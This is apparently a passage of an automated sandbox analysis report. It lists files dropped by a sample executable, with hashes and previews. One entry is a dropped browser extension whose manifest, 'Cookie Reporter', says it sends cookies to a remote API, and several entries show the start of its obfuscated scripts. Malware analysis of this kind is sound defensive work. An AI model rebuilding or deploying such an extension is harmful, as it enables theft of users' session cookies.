                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):179
                                                                                                                                          Entropy (8bit):4.994735851430578
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAcnW5lXVBP:YWLSGTt1o9LuLgfGBPAzkVj/T8nW5NVt
                                                                                                                                          MD5:79D9D2F911BCF03411411E1660916230
                                                                                                                                          SHA1:B17923726CF60E66291C921AEE7E55F1F939BCD6
                                                                                                                                          SHA-256:C3F8B3B96E4AB1BA3AFAEED9362C615B5E5E6C8D67744438BE00F05705801E8A
                                                                                                                                          SHA-512:C0DC204C8DD7ED4D74E2B8F6420946F9644D881FB45B6CB421975526DCA994029C14E90AA22484B28F4FEE5090973F66436A4DEFA12B16041D897667D14E449E
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1713006891202410}]}

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):86
                                                                                                                                          Entropy (8bit):4.3751917412896075
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
                                                                                                                                          MD5:16B7586B9EBA5296EA04B791FC3D675E
                                                                                                                                          SHA1:8890767DD7EB4D1BEAB829324BA8B9599051F0B0
                                                                                                                                          SHA-256:474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
                                                                                                                                          SHA-512:58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\e75b014a-4ae0-4dda-a6c4-cf1f442b07fc.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):44679
                                                                                                                                          Entropy (8bit):6.09711090513334
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xkBCwuihDO6vP6O9l1ogfK5Pi1cGoup1Xl3jVzXr4CW:z/Ps+wsI7yOEA6Hzchu3VlXr4CRo1
                                                                                                                                          MD5:A6E367AD19C3660CF878A3A1DB0098A4
                                                                                                                                          SHA1:C9B06DA50B595FF418808C276BD6F939CF488F81
                                                                                                                                          SHA-256:5557554EAD7C97225226166216E7DB13A24408A3E955C9C198D046CAD045DFF3
                                                                                                                                          SHA-512:EF9370479F9C4FAE0D3D514D2BAD121B0AE7721DD3DC6967E28C1D4E3DCF6F1D9B2B90198BE8DC7BF8C468E1AF82AD649D32A9EE7BCE94EB902267D12344F143
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\e8ca5cf4-de6e-4c63-af2d-742c8b614cfd.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:modified
                                                                                                                                          Size (bytes):44608
                                                                                                                                          Entropy (8bit):6.096527095595211
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkB3wuihDO6vP6O9l1Myfw8PWUwncGoup1Xl3jVzXr2:z/Ps+wsI7ynED6Hechu3VlXr4CRo1
                                                                                                                                          MD5:35EA4CEB79B3C4D66F03C26CB450C079
                                                                                                                                          SHA1:27D237EB84A8E2EA4F26CCB996F2DC6C87A992E5
                                                                                                                                          SHA-256:073D11805136C83455BAE3B226A3E3B852D75BFE6691660ECF56ABC5F65E0A7B
                                                                                                                                          SHA-512:75B708413F3E278965DA8D2E875CF430680719DE81BD5EA7DB598F5657A0FB72517A1F10852A00AB3870A1C9136C0443D7343384D632757D1E174CE1F7717D61
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2278
                                                                                                                                          Entropy (8bit):3.8417669082841237
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:uiTrlKxrgxwxl9Il8ud+3QnNBv9kVMqHnvd1rc:m9YyQnz9kiIn4
                                                                                                                                          MD5:000386EA2A5B686DB75FA9D599785E88
                                                                                                                                          SHA1:354582CCCA44AAD0DF11D47305F7BB7D4175CF2D
                                                                                                                                          SHA-256:A434EB6221D93E3FB25FB301C3C07787A3E4706EC4F7C573C76712196254CADE
                                                                                                                                          SHA-512:3D2EE46524CE4865C980635D6939F0EC4FD17E47435F82E7648C9BCDA66761FCD28EC2970B2939C7FFDDDE7A5E94311912DF80F634C94819D07EFC81AFDCDB39
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.J.s.e.e.b.G.M.2.g.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.7.h.I.o.N.Z.

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):4622
                                                                                                                                          Entropy (8bit):4.0010574610449705
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:FrYXClTSrDcip6P06pvE2MR0Igq3C4gRUlRrmNgS:RACBWQGav6RbgDUlRrQZ
                                                                                                                                          MD5:4577894D965F4C9E3003CD4C7331FDCE
                                                                                                                                          SHA1:84110D32F28488E63AEC6F79B1E2C58E14541EB5
                                                                                                                                          SHA-256:07D426CD61CC6412659FED049395D453A61C1045727D1C7627731DCB365DC1B5
                                                                                                                                          SHA-512:C6892A10B03D855E36CB29C974CC547EC05F3B7D8C349A0FB9A53A6673E7F81589803BC52F61D418E44B86880F41E4D49C75BC0EDD3E519FF95679DD8AEDDA97
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".0.+.U.3.X.6.m.M.2.g.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.7.h.I.o.N.Z.

                                                                                                                                          C:\Users\user\AppData\Local\Temp\446cf057-d943-47ec-9174-0d19ab28e501.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1
                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:L:L
                                                                                                                                          MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                          SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                          SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                          SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.

                                                                                                                                          C:\Users\user\AppData\Local\Temp\97ffb4d8-d282-4e1f-b153-6d3480c5366e.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:Google Chrome extension, version 3
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):11185
                                                                                                                                          Entropy (8bit):7.951995436832936
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                          MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                          SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                          SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                          SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                          C:\Users\user\AppData\Local\Temp\9e02ca84-a978-42cc-8ab1-248802d1d0cc.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):206855
                                                                                                                                          Entropy (8bit):7.983996634657522
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEI5:l81Lel7E6lEMVo/S01fDpWmEgD
                                                                                                                                          MD5:788DF0376CE061534448AA17288FEA95
                                                                                                                                          SHA1:C3B9285574587B3D1950EE4A8D64145E93842AEB
                                                                                                                                          SHA-256:B7FB1D3C27E04785757E013EC1AC4B1551D862ACD86F6888217AB82E642882A5
                                                                                                                                          SHA-512:3AA9C1AA00060753422650BBFE58EEEA308DA018605A6C5287788C3E2909BE876367F83B541E1D05FE33F284741250706339010571D2E2D153A5C5A107D35001
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

                                                                                                                                          C:\Users\user\AppData\Local\Temp\Extension\background.js

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                                          File Type:ASCII text, with very long lines (30580), with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):35466
                                                                                                                                          Entropy (8bit):5.375743032961357
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:GgnO8bwNKyvM9phVeWwWndXsYAkHZor0hZAbtPNLKoMThDyEF3nyJWaFe3pcLcfr:hn74eT1VROLRIlML585
                                                                                                                                          MD5:F5CF44F579A62B219143DE8C8D7A166F
                                                                                                                                          SHA1:9BA5FAEE9CBE73907D0C4536BE0BA329A96EC6A8
                                                                                                                                          SHA-256:72FFA98A4D2E03D6982B3CD4327273F8FB8E810A755DCE8F68F85E84B9ECA890
                                                                                                                                          SHA-512:1D6B515F910591A8C04D9CE29F2A4659F2052F718FA0AEEDE2663AE892D59217F63727E06BEF6708B0F3B6213385B207175CE21C8F7CF01DE72C353A72155070
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:(function(_0x976af2,_0x46d10d){function _0x352f57(_0x2c46a8,_0x4efd25,_0x5c5a82,_0x48d698){return _0x1783(_0x2c46a8- -0x149,_0x4efd25);}function _0x5a0895(_0x5759ae,_0x55e103,_0x24b7b0,_0x550e55){return _0x1783(_0x550e55-0x212,_0x24b7b0);}const _0xfc41f7=_0x976af2();while(!![]){try{const _0x2e5a8d=parseInt(_0x352f57(-0x3a,-0x84,-0x6c,-0x3))/(0x1268+-0x1beb*0x1+-0xcb*-0xc)*(parseInt(_0x5a0895(0x306,0x2d8,0x2dc,0x2dd))/(-0x149a+-0x19d6+0x2e72))+-parseInt(_0x352f57(-0x15,-0x42,0x15,-0x17))/(0x26d8+0xa*-0xed+-0x1d93)+parseInt(_0x352f57(-0x96,-0xda,-0x48,-0x54))/(-0x353+0x4*-0x2a5+-0x1*-0xdeb)+-parseInt(_0x352f57(-0x98,-0xc6,-0xa0,-0xd4))/(-0x95*-0x1+0x1*0xe84+-0x3c5*0x4)+parseInt(_0x5a0895(0x2ca,0x32a,0x2b2,0x2f7))/(-0x7b7+-0x10de+0x189b)+-parseInt(_0x352f57(-0x62,-0x69,-0x27,-0x6c))/(0x99*0x1+0x16d1+0x1763*-0x1)*(-parseInt(_0x352f57(-0x82,-0x7c,-0x54,-0xbb))/(0x21a7*0x1+-0x2083+-0x11c))+-parseInt(_0x352f57(-0xa3,-0xcd,-0xb4,-0xfe))/(0xb8c+0x43e*-0x9+0x1aab)*(-parseInt(_0x352f57(-0x9a,-0x6

                                                                                                                                          C:\Users\user\AppData\Local\Temp\Extension\content.js

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                                          File Type:ASCII text, with very long lines (17078), with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):17078
                                                                                                                                          Entropy (8bit):5.157930453785343
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:J98jyHkKjLz1Mf0O8pTYpFhCQ8/PraOWltPaXEWWjlnD4Cx0kTMlYsjvYwjsqV9j:J90yHkKjLz1pO8pTYpFhCQ8/PraOWlt2
                                                                                                                                          MD5:D17DB5576C8452570C6B6231F4FB073F
                                                                                                                                          SHA1:DD9B772365A8F804D574E487E3AF127A9E85EEC1
                                                                                                                                          SHA-256:FA9A83CFBAA6181BC5283B7FABA840A87A2299BDC7E2BBFAC9DA82BB815A83AD
                                                                                                                                          SHA-512:9CD71DC1D26E94F7286FDBDCD50CA3F1BC699EE7D862CBE9392F473F4A88B8F5B9BF94D5A9CFF046AF53B4633971C072A183A41BB069919E8658F08564025ECD
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:function _0x48e31c(_0x5ee0f0,_0x46e55a,_0xe3d16b,_0x4ca0d4){return _0x2e44(_0x5ee0f0-0x14,_0x4ca0d4);}(function(_0x32c2b7,_0x2df9b3){function _0xdff551(_0x50bbc2,_0x8262f,_0x17973c,_0x3bc36){return _0x2e44(_0x50bbc2- -0x373,_0x8262f);}function _0x4a4d19(_0x5988dd,_0x5573c3,_0x1478e0,_0x5328a9){return _0x2e44(_0x1478e0-0x122,_0x5988dd);}const _0x155164=_0x32c2b7();while(!![]){try{const _0x3f77c3=-parseInt(_0xdff551(-0x1ae,-0x185,-0x189,-0x1c2))/(0x115c+-0x3ac*0xa+0x135d)+-parseInt(_0xdff551(-0x1ac,-0x1ce,-0x18d,-0x1af))/(-0x26*-0x2+0x26c3+-0x270d)+-parseInt(_0xdff551(-0x195,-0x18b,-0x19b,-0x1ba))/(0x1136+-0x1d7b+-0x18*-0x83)*(parseInt(_0xdff551(-0x198,-0x1af,-0x1c4,-0x176))/(-0x748*-0x4+0x1354+0x19*-0x1f0))+-parseInt(_0xdff551(-0x19c,-0x1bb,-0x188,-0x1af))/(0x2226+-0x6fc+-0x1b25*0x1)*(parseInt(_0xdff551(-0x1b7,-0x1c0,-0x1a1,-0x195))/(0x16*0xb0+-0xd33*-0x1+0x2d*-0xa1))+parseInt(_0x4a4d19(0x280,0x2c8,0x2b2,0x295))/(-0x1*-0xa+0x1*-0x3ce+0x3cb)+-parseInt(_0x4a4d19(0x2bd,0x2be,0x2d2,0x2fa))/

                                                                                                                                          C:\Users\user\AppData\Local\Temp\Extension\injected-script.js

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                                          File Type:ASCII text, with very long lines (22814), with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):22814
                                                                                                                                          Entropy (8bit):5.147721406770086
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:klZSKgYHD6OJv8HpY0KJTEqUeBwD1ceeATwTTiBt4N91pny/32xVOSz0vTdV34Ea:klcKgYHD6OJv8HpY0CTEqUeBwD1ceeAu
                                                                                                                                          MD5:FB32D5C0075EDE30720889842B401EEE
                                                                                                                                          SHA1:39CA4E3A2F961720D3FBFC68D63936CFC225AD8A
                                                                                                                                          SHA-256:0369B699759CE2646856A3868B509C89877ECAEA4E799D4BC2D47D6ED5E0423A
                                                                                                                                          SHA-512:AA5CCE96B2B61588C878871FF43A6779FFEB1C73BA3ED7E72A2A3C2AF5FFCD83F66CB8130537CCD47E9550464402F6A433FC3A174B2ADDACB76B05E6D16BF696
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:(function(_0x481492,_0x45ae6c){const _0x3f5313=_0x481492();function _0x1deeb4(_0x3ce77e,_0x2403f9,_0x8372d0,_0x2fb9a5){return _0x4e8b(_0x2403f9-0x154,_0x3ce77e);}function _0x12bf38(_0x17d090,_0x2809aa,_0x5a3519,_0x806597){return _0x4e8b(_0x5a3519-0x3a6,_0x806597);}while(!![]){try{const _0x35b7a6=parseInt(_0x12bf38(0x49c,0x484,0x49b,0x476))/(0xb*0x20f+0x1592+-0x2c36*0x1)+-parseInt(_0x12bf38(0x47d,0x4a8,0x49c,0x4cd))/(0x1223*0x2+0x19df*-0x1+-0xa65)*(parseInt(_0x1deeb4(0x231,0x256,0x215,0x285))/(0xab7+0x1c23*0x1+0x26d7*-0x1))+-parseInt(_0x12bf38(0x4a7,0x43e,0x47b,0x464))/(0xdca*0x1+0x1f1c+-0x2ce2)*(parseInt(_0x12bf38(0x40e,0x419,0x44d,0x490))/(-0x227e*0x1+0xc3*0x19+-0xc6*-0x14))+-parseInt(_0x12bf38(0x497,0x4b9,0x482,0x46b))/(0xc7*0xd+-0x1*-0x1897+-0x22ac)*(-parseInt(_0x1deeb4(0x24d,0x279,0x281,0x246))/(-0x1b4b+-0x1*0x1765+0x1*0x32b7))+-parseInt(_0x12bf38(0x4aa,0x4eb,0x4cf,0x509))/(-0x3*0x64d+-0x76f*0x1+0x1a5e)*(parseInt(_0x1deeb4(0x213,0x204,0x22c,0x22a))/(0x2*0x106c+-0x9*0x1a6+-0x11f9*0x

                                                                                                                                          C:\Users\user\AppData\Local\Temp\Extension\manifest.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):774
                                                                                                                                          Entropy (8bit):4.693596863078191
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:uAd71w3lpRpYnxnYduxX8o8GFUj1Xf0zz6WRRNB+D4LC/3ik:ue71w3l/pYxz8o8GFU14z6Wt+DeS3ik
                                                                                                                                          MD5:A251E7E7AC8FA2831021602FDAB8D8CE
                                                                                                                                          SHA1:82A930203B74A9BAB197B610EF6EFC88C2D260CA
                                                                                                                                          SHA-256:B0DCE9FE9E195D1D68EF58382CB9BC57CD0DFC295239DAD08DC05E07BFF59BC1
                                                                                                                                          SHA-512:D4F8ABFC95C8429EAF2AFEC14F3847731860C04DB74181BEF3EE4C1AD893C2586A30D2D0EDD23070900600BBF728ED14076C02352466DF5C60B770BD507B965D
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{. "manifest_version": 3,. "name": "Cookie Reporter",. "version": "1.0",. "description": "Automatically report cookies to a remote API",. "permissions": [. "webNavigation",. "storage",. "activeTab",. "webRequest",. "cookies",. "webRequestBlocking",. "declarativeNetRequestWithHostAccess",. "downloads",. "notifications",. "scripting",. "http://*/*",. "https://*/*",."http://www.google.com/*",.."tabs". ],. "host_permissions": ["https://*/*"],. "background": {. "service_worker": "background.js". },.. "content_scripts": [ ..{. "js": [ "content.js" ],. "matches": [ "https://*/*"]. } . ],. "web_accessible_resources": [{. "resources": ["injected-script.js", "/images/*"],. "matches": ["<all_urls>"].}].}.

                                                                                                                                          C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2110
                                                                                                                                          Entropy (8bit):5.402524537413037
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:Yzj57SnaJ57H57Uv5W1Sj5W175zuR5z+5zn071eDJk5c1903bj5jJp0gcU854RrN:8e2Fa116uCntc5toYt0i
                                                                                                                                          MD5:0E6CCBD8888D8150ED7808681B052778
